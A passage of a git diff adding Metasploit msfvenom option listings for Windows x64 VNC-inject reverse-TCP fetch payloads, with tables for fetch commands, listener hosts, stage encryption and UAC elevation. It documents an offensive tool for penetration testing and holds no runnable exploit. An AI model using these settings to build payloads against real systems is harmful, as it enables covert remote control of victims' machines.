5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt new file mode 100644 index 0000000..4d74211 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_rc4.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME owtbxYHW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp_uuid.txt new file mode 100644 index 0000000..e69de29